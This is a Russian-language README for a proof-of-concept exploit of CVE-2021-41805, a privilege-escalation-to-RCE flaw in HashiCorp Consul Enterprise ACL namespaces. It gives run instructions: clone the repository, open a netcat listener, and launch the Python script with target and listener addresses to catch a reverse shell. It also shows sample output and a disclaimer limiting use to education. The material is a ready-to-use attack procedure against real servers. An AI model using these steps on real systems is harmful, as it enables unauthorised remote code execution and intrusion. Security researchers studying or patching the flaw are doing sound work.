
Эксплойт-концепт для CVE-2021-41805 — уязвимости в HashiCorp Consul Enterprise, допускающей удалённое выполнение кода (RCE) с расширенными привилегиями.
[!WARNING] ПРАВОВОЙ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот инструмент предназначен СТРОГО ТОЛЬКО для ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ! Использование этого инструмента для атак на цели без предварительного обоюдного согласия ЯВЛЯЕТСЯ НЕЗАКОННЫМ. Ответственность за соблюдение всех применимых законов при использовании этого инструмента лежит на пользователе. Разработчик этого инструмента не несёт ответственности и не отвечает за любое неправомерное использование или ущерб, причинённый данной программой.
ACL-токен (с правами по умолчанию operator:write) в одном пространстве имён (namespace) может быть использован для непреднамеренного повышения привилегий в другом пространстве имён. Этим можно злоупотребить для получения удалённого выполнения кода (RCE) с повышенными привилегиями.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]
При запуске эксплойта с базовыми аргументами: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [Use SSL]) вывод будет выглядеть примерно так:
[*] The PUT request was made successfully. Check your listener...
При запуске эксплойта с базовыми аргументами и флагом -v [VERBOSE] вывод будет подробным:

Если при запуске эксплойта произойдёт ошибка и будет указан аргумент -v, вывод будет выглядеть примерно так:
